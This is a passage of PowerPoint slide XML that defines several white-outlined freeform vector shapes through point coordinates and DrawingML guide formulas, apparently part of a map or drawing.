                      <a:pt x="335" y="452"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="336" y="456"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="342" y="467"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="348" y="474"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="361" y="484"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="370" y="494"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="375" y="502"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="379" y="510"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="382" y="520"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="369" y="515"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="358" y="509"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="349" y="504"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="339" y="503"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="331" y="499"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="324" y="489"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="316" y="487"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="312" y="483"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="481"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="307" y="484"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36221" name="Freeform 354"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1110" y="1167"/>
                <a:ext cx="100" cy="137"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 63 w 100"/>
                  <a:gd name="T1" fmla="*/ 137 h 137"/>
                  <a:gd name="T2" fmla="*/ 59 w 100"/>
                  <a:gd name="T3" fmla="*/ 135 h 137"/>
                  <a:gd name="T4" fmla="*/ 51 w 100"/>
                  <a:gd name="T5" fmla="*/ 123 h 137"/>
                  <a:gd name="T6" fmla="*/ 45 w 100"/>
                  <a:gd name="T7" fmla="*/ 108 h 137"/>
                  <a:gd name="T8" fmla="*/ 37 w 100"/>
                  <a:gd name="T9" fmla="*/ 97 h 137"/>
                  <a:gd name="T10" fmla="*/ 30 w 100"/>
                  <a:gd name="T11" fmla="*/ 92 h 137"/>
                  <a:gd name="T12" fmla="*/ 20 w 100"/>
                  <a:gd name="T13" fmla="*/ 89 h 137"/>
                  <a:gd name="T14" fmla="*/ 16 w 100"/>
                  <a:gd name="T15" fmla="*/ 85 h 137"/>
                  <a:gd name="T16" fmla="*/ 0 w 100"/>
                  <a:gd name="T17" fmla="*/ 60 h 137"/>
                  <a:gd name="T18" fmla="*/ 6 w 100"/>
                  <a:gd name="T19" fmla="*/ 44 h 137"/>
                  <a:gd name="T20" fmla="*/ 11 w 100"/>
                  <a:gd name="T21" fmla="*/ 47 h 137"/>
                  <a:gd name="T22" fmla="*/ 18 w 100"/>
                  <a:gd name="T23" fmla="*/ 59 h 137"/>
                  <a:gd name="T24" fmla="*/ 26 w 100"/>
                  <a:gd name="T25" fmla="*/ 64 h 137"/>
                  <a:gd name="T26" fmla="*/ 29 w 100"/>
                  <a:gd name="T27" fmla="*/ 65 h 137"/>
                  <a:gd name="T28" fmla="*/ 33 w 100"/>
                  <a:gd name="T29" fmla="*/ 59 h 137"/>
                  <a:gd name="T30" fmla="*/ 40 w 100"/>
                  <a:gd name="T31" fmla="*/ 43 h 137"/>
                  <a:gd name="T32" fmla="*/ 43 w 100"/>
                  <a:gd name="T33" fmla="*/ 43 h 137"/>
                  <a:gd name="T34" fmla="*/ 43 w 100"/>
                  <a:gd name="T35" fmla="*/ 37 h 137"/>
                  <a:gd name="T36" fmla="*/ 35 w 100"/>
                  <a:gd name="T37" fmla="*/ 23 h 137"/>
                  <a:gd name="T38" fmla="*/ 28 w 100"/>
                  <a:gd name="T39" fmla="*/ 12 h 137"/>
                  <a:gd name="T40" fmla="*/ 27 w 100"/>
                  <a:gd name="T41" fmla="*/ 7 h 137"/>
                  <a:gd name="T42" fmla="*/ 28 w 100"/>
                  <a:gd name="T43" fmla="*/ 4 h 137"/>
                  <a:gd name="T44" fmla="*/ 40 w 100"/>
                  <a:gd name="T45" fmla="*/ 6 h 137"/>
                  <a:gd name="T46" fmla="*/ 45 w 100"/>
                  <a:gd name="T47" fmla="*/ 0 h 137"/>
                  <a:gd name="T48" fmla="*/ 48 w 100"/>
                  <a:gd name="T49" fmla="*/ 0 h 137"/>
                  <a:gd name="T50" fmla="*/ 55 w 100"/>
                  <a:gd name="T51" fmla="*/ 10 h 137"/>
                  <a:gd name="T52" fmla="*/ 59 w 100"/>
                  <a:gd name="T53" fmla="*/ 11 h 137"/>
                  <a:gd name="T54" fmla="*/ 63 w 100"/>
                  <a:gd name="T55" fmla="*/ 10 h 137"/>
                  <a:gd name="T56" fmla="*/ 66 w 100"/>
                  <a:gd name="T57" fmla="*/ 4 h 137"/>
                  <a:gd name="T58" fmla="*/ 75 w 100"/>
                  <a:gd name="T59" fmla="*/ 0 h 137"/>
                  <a:gd name="T60" fmla="*/ 84 w 100"/>
                  <a:gd name="T61" fmla="*/ 2 h 137"/>
                  <a:gd name="T62" fmla="*/ 91 w 100"/>
                  <a:gd name="T63" fmla="*/ 8 h 137"/>
                  <a:gd name="T64" fmla="*/ 89 w 100"/>
                  <a:gd name="T65" fmla="*/ 15 h 137"/>
                  <a:gd name="T66" fmla="*/ 84 w 100"/>
                  <a:gd name="T67" fmla="*/ 18 h 137"/>
                  <a:gd name="T68" fmla="*/ 82 w 100"/>
                  <a:gd name="T69" fmla="*/ 26 h 137"/>
                  <a:gd name="T70" fmla="*/ 71 w 100"/>
                  <a:gd name="T71" fmla="*/ 36 h 137"/>
                  <a:gd name="T72" fmla="*/ 68 w 100"/>
                  <a:gd name="T73" fmla="*/ 40 h 137"/>
                  <a:gd name="T74" fmla="*/ 68 w 100"/>
                  <a:gd name="T75" fmla="*/ 45 h 137"/>
                  <a:gd name="T76" fmla="*/ 70 w 100"/>
                  <a:gd name="T77" fmla="*/ 51 h 137"/>
                  <a:gd name="T78" fmla="*/ 73 w 100"/>
                  <a:gd name="T79" fmla="*/ 53 h 137"/>
                  <a:gd name="T80" fmla="*/ 78 w 100"/>
                  <a:gd name="T81" fmla="*/ 51 h 137"/>
                  <a:gd name="T82" fmla="*/ 86 w 100"/>
                  <a:gd name="T83" fmla="*/ 55 h 137"/>
                  <a:gd name="T84" fmla="*/ 92 w 100"/>
                  <a:gd name="T85" fmla="*/ 61 h 137"/>
                  <a:gd name="T86" fmla="*/ 95 w 100"/>
                  <a:gd name="T87" fmla="*/ 62 h 137"/>
                  <a:gd name="T88" fmla="*/ 99 w 100"/>
                  <a:gd name="T89" fmla="*/ 68 h 137"/>
                  <a:gd name="T90" fmla="*/ 100 w 100"/>
                  <a:gd name="T91" fmla="*/ 78 h 137"/>
                  <a:gd name="T92" fmla="*/ 95 w 100"/>
                  <a:gd name="T93" fmla="*/ 87 h 137"/>
                  <a:gd name="T94" fmla="*/ 94 w 100"/>
                  <a:gd name="T95" fmla="*/ 95 h 137"/>
                  <a:gd name="T96" fmla="*/ 92 w 100"/>
                  <a:gd name="T97" fmla="*/ 111 h 137"/>
                  <a:gd name="T98" fmla="*/ 89 w 100"/>
                  <a:gd name="T99" fmla="*/ 119 h 137"/>
                  <a:gd name="T100" fmla="*/ 85 w 100"/>
                  <a:gd name="T101" fmla="*/ 122 h 137"/>
                  <a:gd name="T102" fmla="*/ 81 w 100"/>
                  <a:gd name="T103" fmla="*/ 122 h 137"/>
                  <a:gd name="T104" fmla="*/ 77 w 100"/>
                  <a:gd name="T105" fmla="*/ 120 h 137"/>
                  <a:gd name="T106" fmla="*/ 71 w 100"/>
                  <a:gd name="T107" fmla="*/ 112 h 137"/>
                  <a:gd name="T108" fmla="*/ 66 w 100"/>
                  <a:gd name="T109" fmla="*/ 110 h 137"/>
                  <a:gd name="T110" fmla="*/ 66 w 100"/>
                  <a:gd name="T111" fmla="*/ 115 h 137"/>
                  <a:gd name="T112" fmla="*/ 74 w 100"/>
                  <a:gd name="T113" fmla="*/ 127 h 137"/>
                  <a:gd name="T114" fmla="*/ 68 w 100"/>
                  <a:gd name="T115" fmla="*/ 136 h 137"/>
                  <a:gd name="T116" fmla="*/ 63 w 100"/>
                  <a:gd name="T117" fmla="*/ 137 h 137"/>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00"/>
                  <a:gd name="T178" fmla="*/ 0 h 137"/>
                  <a:gd name="T179" fmla="*/ 100 w 100"/>
                  <a:gd name="T180" fmla="*/ 137 h 137"/>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00" h="137">
                    <a:moveTo>
                      <a:pt x="63" y="137"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="59" y="135"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="51" y="123"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="108"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="97"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="30" y="92"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="20" y="89"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="16" y="85"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="60"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="6" y="44"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="47"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="26" y="64"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="29" y="65"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="33" y="59"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="43"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="43" y="37"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="35" y="23"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="12"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="27" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="40" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="45" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="55" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="59" y="11"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="91" y="8"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="84" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="82" y="26"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="36"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="40"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="45"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="70" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="53"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="51"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="86" y="55"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="61"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="62"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="99" y="68"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="100" y="78"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="95" y="87"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="94" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="92" y="111"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="89" y="119"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="85" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="122"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="77" y="120"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="71" y="112"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="110"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="115"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="74" y="127"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="68" y="136"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="63" y="137"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36222" name="Freeform 355"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="1221" y="1153"/>
                <a:ext cx="83" cy="109"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 18 w 83"/>
                  <a:gd name="T1" fmla="*/ 109 h 109"/>
                  <a:gd name="T2" fmla="*/ 10 w 83"/>
                  <a:gd name="T3" fmla="*/ 104 h 109"/>
                  <a:gd name="T4" fmla="*/ 9 w 83"/>
                  <a:gd name="T5" fmla="*/ 91 h 109"/>
                  <a:gd name="T6" fmla="*/ 2 w 83"/>
                  <a:gd name="T7" fmla="*/ 72 h 109"/>
                  <a:gd name="T8" fmla="*/ 0 w 83"/>
                  <a:gd name="T9" fmla="*/ 58 h 109"/>
                  <a:gd name="T10" fmla="*/ 1 w 83"/>
                  <a:gd name="T11" fmla="*/ 48 h 109"/>
                  <a:gd name="T12" fmla="*/ 3 w 83"/>
                  <a:gd name="T13" fmla="*/ 32 h 109"/>
                  <a:gd name="T14" fmla="*/ 5 w 83"/>
                  <a:gd name="T15" fmla="*/ 24 h 109"/>
                  <a:gd name="T16" fmla="*/ 14 w 83"/>
                  <a:gd name="T17" fmla="*/ 24 h 109"/>
                  <a:gd name="T18" fmla="*/ 14 w 83"/>
                  <a:gd name="T19" fmla="*/ 20 h 109"/>
                  <a:gd name="T20" fmla="*/ 11 w 83"/>
                  <a:gd name="T21" fmla="*/ 14 h 109"/>
                  <a:gd name="T22" fmla="*/ 9 w 83"/>
                  <a:gd name="T23" fmla="*/ 6 h 109"/>
                  <a:gd name="T24" fmla="*/ 11 w 83"/>
                  <a:gd name="T25" fmla="*/ 4 h 109"/>
                  <a:gd name="T26" fmla="*/ 13 w 83"/>
                  <a:gd name="T27" fmla="*/ 2 h 109"/>
                  <a:gd name="T28" fmla="*/ 28 w 83"/>
                  <a:gd name="T29" fmla="*/ 0 h 109"/>
                  <a:gd name="T30" fmla="*/ 37 w 83"/>
                  <a:gd name="T31" fmla="*/ 3 h 109"/>
                  <a:gd name="T32" fmla="*/ 47 w 83"/>
                  <a:gd name="T33" fmla="*/ 9 h 109"/>
                  <a:gd name="T34" fmla="*/ 57 w 83"/>
                  <a:gd name="T35" fmla="*/ 10 h 109"/>
                  <a:gd name="T36" fmla="*/ 66 w 83"/>
                  <a:gd name="T37" fmla="*/ 7 h 109"/>
                  <a:gd name="T38" fmla="*/ 73 w 83"/>
                  <a:gd name="T39" fmla="*/ 7 h 109"/>
                  <a:gd name="T40" fmla="*/ 78 w 83"/>
                  <a:gd name="T41" fmla="*/ 10 h 109"/>
                  <a:gd name="T42" fmla="*/ 83 w 83"/>
                  <a:gd name="T43" fmla="*/ 15 h 109"/>
                  <a:gd name="T44" fmla="*/ 83 w 83"/>
                  <a:gd name="T45" fmla="*/ 18 h 109"/>
                  <a:gd name="T46" fmla="*/ 81 w 83"/>
                  <a:gd name="T47" fmla="*/ 22 h 109"/>
                  <a:gd name="T48" fmla="*/ 75 w 83"/>
                  <a:gd name="T49" fmla="*/ 33 h 109"/>
                  <a:gd name="T50" fmla="*/ 69 w 83"/>
                  <a:gd name="T51" fmla="*/ 52 h 109"/>
                  <a:gd name="T52" fmla="*/ 58 w 83"/>
                  <a:gd name="T53" fmla="*/ 74 h 109"/>
                  <a:gd name="T54" fmla="*/ 48 w 83"/>
                  <a:gd name="T55" fmla="*/ 76 h 109"/>
                  <a:gd name="T56" fmla="*/ 32 w 83"/>
                  <a:gd name="T57" fmla="*/ 72 h 109"/>
                  <a:gd name="T58" fmla="*/ 22 w 83"/>
                  <a:gd name="T59" fmla="*/ 74 h 109"/>
                  <a:gd name="T60" fmla="*/ 32 w 83"/>
                  <a:gd name="T61" fmla="*/ 91 h 109"/>
                  <a:gd name="T62" fmla="*/ 31 w 83"/>
                  <a:gd name="T63" fmla="*/ 98 h 109"/>
                  <a:gd name="T64" fmla="*/ 25 w 83"/>
                  <a:gd name="T65" fmla="*/ 107 h 109"/>
                  <a:gd name="T66" fmla="*/ 18 w 83"/>
                  <a:gd name="T67" fmla="*/ 109 h 109"/>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83"/>
                  <a:gd name="T103" fmla="*/ 0 h 109"/>
                  <a:gd name="T104" fmla="*/ 83 w 83"/>
                  <a:gd name="T105" fmla="*/ 109 h 109"/>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83" h="109">
                    <a:moveTo>
                      <a:pt x="18" y="109"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="10" y="104"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="58"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1" y="48"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="3" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="5" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="24"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="14" y="20"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="14"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="9" y="6"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="11" y="4"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="13" y="2"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="28" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="37" y="3"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="47" y="9"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="57" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="66" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="73" y="7"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="78" y="10"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="15"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="83" y="18"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="75" y="33"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="69" y="52"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="58" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="48" y="76"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="72"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="22" y="74"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="32" y="91"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="31" y="98"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="25" y="107"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="18" y="109"/>
                    </a:lnTo>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:noFill/>
              <a:ln w="2" cap="rnd">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
            </p:spPr>
            <p:txBody>
              <a:bodyPr/>
              <a:lstStyle/>
              <a:p>
                <a:endParaRPr lang="en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="36223" name="Freeform 356"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="741" y="1129"/>
                <a:ext cx="163" cy="185"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 53 w 163"/>
                  <a:gd name="T1" fmla="*/ 185 h 185"/>
                  <a:gd name="T2" fmla="*/ 47 w 163"/>
                  <a:gd name="T3" fmla="*/ 185 h 185"/>
                  <a:gd name="T4" fmla="*/ 39 w 163"/>
                  <a:gd name="T5" fmla="*/ 183 h 185"/>
                  <a:gd name="T6" fmla="*/ 36 w 163"/>
                  <a:gd name="T7" fmla="*/ 172 h 185"/>
                  <a:gd name="T8" fmla="*/ 33 w 163"/>
                  <a:gd name="T9" fmla="*/ 162 h 185"/>
                  <a:gd name="T10" fmla="*/ 29 w 163"/>
                  <a:gd name="T11" fmla="*/ 156 h 185"/>
                  <a:gd name="T12" fmla="*/ 21 w 163"/>
                  <a:gd name="T13" fmla="*/ 148 h 185"/>
                  <a:gd name="T14" fmla="*/ 12 w 163"/>
                  <a:gd name="T15" fmla="*/ 146 h 185"/>
                  <a:gd name="T16" fmla="*/ 5 w 163"/>
                  <a:gd name="T17" fmla="*/ 143 h 185"/>
                  <a:gd name="T18" fmla="*/ 1 w 163"/>
                  <a:gd name="T19" fmla="*/ 138 h 185"/>
                  <a:gd name="T20" fmla="*/ 0 w 163"/>
                  <a:gd name="T21" fmla="*/ 134 h 185"/>
                  <a:gd name="T22" fmla="*/ 4 w 163"/>
                  <a:gd name="T23" fmla="*/ 132 h 185"/>
                  <a:gd name="T24" fmla="*/ 8 w 163"/>
                  <a:gd name="T25" fmla="*/ 125 h 185"/>
                  <a:gd name="T26" fmla="*/ 12 w 163"/>
                  <a:gd name="T27" fmla="*/ 120 h 185"/>
                  <a:gd name="T28" fmla="*/ 12 w 163"/>
                  <a:gd name="T29" fmla="*/ 111 h 185"/>
                  <a:gd name="T30" fmla="*/ 9 w 163"/>
                  <a:gd name="T31" fmla="*/ 91 h 185"/>
                  <a:gd name="T32" fmla="*/ 13 w 163"/>
                  <a:gd name="T33" fmla="*/ 91 h 185"/>
                  <a:gd name="T34" fmla="*/ 17 w 163"/>
                  <a:gd name="T35" fmla="*/ 87 h 185"/>
                  <a:gd name="T36" fmla="*/ 19 w 163"/>
                  <a:gd name="T37" fmla="*/ 78 h 185"/>
                  <a:gd name="T38" fmla="*/ 27 w 163"/>
                  <a:gd name="T39" fmla="*/ 65 h 185"/>
                  <a:gd name="T40" fmla="*/ 30 w 163"/>
                  <a:gd name="T41" fmla="*/ 50 h 185"/>
                  <a:gd name="T42" fmla="*/ 30 w 163"/>
                  <a:gd name="T43" fmla="*/ 42 h 185"/>
                  <a:gd name="T44" fmla="*/ 28 w 163"/>
                  <a:gd name="T45" fmla="*/ 37 h 185"/>
                  <a:gd name="T46" fmla="*/ 19 w 163"/>
                  <a:gd name="T47" fmla="*/ 20 h 185"/>
                  <a:gd name="T48" fmla="*/ 16 w 163"/>
                  <a:gd name="T49" fmla="*/ 8 h 185"/>
                  <a:gd name="T50" fmla="*/ 22 w 163"/>
                  <a:gd name="T51" fmla="*/ 8 h 185"/>
                  <a:gd name="T52" fmla="*/ 28 w 163"/>
                  <a:gd name="T53" fmla="*/ 6 h 185"/>
                  <a:gd name="T54" fmla="*/ 39 w 163"/>
                  <a:gd name="T55" fmla="*/ 8 h 185"/>
                  <a:gd name="T56" fmla="*/ 46 w 163"/>
                  <a:gd name="T57" fmla="*/ 8 h 185"/>
                  <a:gd name="T58" fmla="*/ 56 w 163"/>
                  <a:gd name="T59" fmla="*/ 6 h 185"/>
                  <a:gd name="T60" fmla="*/ 65 w 163"/>
                  <a:gd name="T61" fmla="*/ 2 h 185"/>
                  <a:gd name="T62" fmla="*/ 74 w 163"/>
                  <a:gd name="T63" fmla="*/ 0 h 185"/>
                  <a:gd name="T64" fmla="*/ 78 w 163"/>
                  <a:gd name="T65" fmla="*/ 3 h 185"/>
                  <a:gd name="T66" fmla="*/ 101 w 163"/>
                  <a:gd name="T67" fmla="*/ 24 h 185"/>
                  <a:gd name="T68" fmla="*/ 108 w 163"/>
                  <a:gd name="T69" fmla="*/ 27 h 185"/>
                  <a:gd name="T70" fmla="*/ 113 w 163"/>
                  <a:gd name="T71" fmla="*/ 25 h 185"/>
                  <a:gd name="T72" fmla="*/ 122 w 163"/>
                  <a:gd name="T73" fmla="*/ 22 h 185"/>
                  <a:gd name="T74" fmla="*/ 131 w 163"/>
                  <a:gd name="T75" fmla="*/ 22 h 185"/>
                  <a:gd name="T76" fmla="*/ 136 w 163"/>
                  <a:gd name="T77" fmla="*/ 24 h 185"/>
                  <a:gd name="T78" fmla="*/ 146 w 163"/>
                  <a:gd name="T79" fmla="*/ 34 h 185"/>
                  <a:gd name="T80" fmla="*/ 163 w 163"/>
                  <a:gd name="T81" fmla="*/ 55 h 185"/>
                  <a:gd name="T82" fmla="*/ 161 w 163"/>
                  <a:gd name="T83" fmla="*/ 58 h 185"/>
                  <a:gd name="T84" fmla="*/ 158 w 163"/>
                  <a:gd name="T85" fmla="*/ 59 h 185"/>
                  <a:gd name="T86" fmla="*/ 156 w 163"/>
                  <a:gd name="T87" fmla="*/ 61 h 185"/>
                  <a:gd name="T88" fmla="*/ 145 w 163"/>
                  <a:gd name="T89" fmla="*/ 69 h 185"/>
                  <a:gd name="T90" fmla="*/ 137 w 163"/>
                  <a:gd name="T91" fmla="*/ 73 h 185"/>
                  <a:gd name="T92" fmla="*/ 124 w 163"/>
                  <a:gd name="T93" fmla="*/ 83 h 185"/>
                  <a:gd name="T94" fmla="*/ 116 w 163"/>
                  <a:gd name="T95" fmla="*/ 91 h 185"/>
                  <a:gd name="T96" fmla="*/ 105 w 163"/>
                  <a:gd name="T97" fmla="*/ 109 h 185"/>
                  <a:gd name="T98" fmla="*/ 98 w 163"/>
                  <a:gd name="T99" fmla="*/ 122 h 185"/>
                  <a:gd name="T100" fmla="*/ 94 w 163"/>
                  <a:gd name="T101" fmla="*/ 124 h 185"/>
                  <a:gd name="T102" fmla="*/ 87 w 163"/>
                  <a:gd name="T103" fmla="*/ 127 h 185"/>
                  <a:gd name="T104" fmla="*/ 87 w 163"/>
                  <a:gd name="T105" fmla="*/ 148 h 185"/>
                  <a:gd name="T106" fmla="*/ 85 w 163"/>
                  <a:gd name="T107" fmla="*/ 160 h 185"/>
                  <a:gd name="T108" fmla="*/ 81 w 163"/>
                  <a:gd name="T109" fmla="*/ 166 h 185"/>
                  <a:gd name="T110" fmla="*/ 72 w 163"/>
                  <a:gd name="T111" fmla="*/ 169 h 185"/>
                  <a:gd name="T112" fmla="*/ 63 w 163"/>
                  <a:gd name="T113" fmla="*/ 167 h 185"/>
                  <a:gd name="T114" fmla="*/ 60 w 163"/>
                  <a:gd name="T115" fmla="*/ 178 h 185"/>
                  <a:gd name="T116" fmla="*/ 53 w 163"/>
                  <a:gd name="T117" fmla="*/ 185 h 185"/>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63"/>
                  <a:gd name="T178" fmla="*/ 0 h 185"/>
                  <a:gd name="T179" fmla="*/ 163 w 163"/>
                  <a:gd name="T180" fmla="*/ 185 h 185"/>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63" h="185">
                    <a:moveTo>
                      <a:pt x="53" y="185"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="47" y="185"/>
                    </a:lnTo>
                    <a:lnTo>
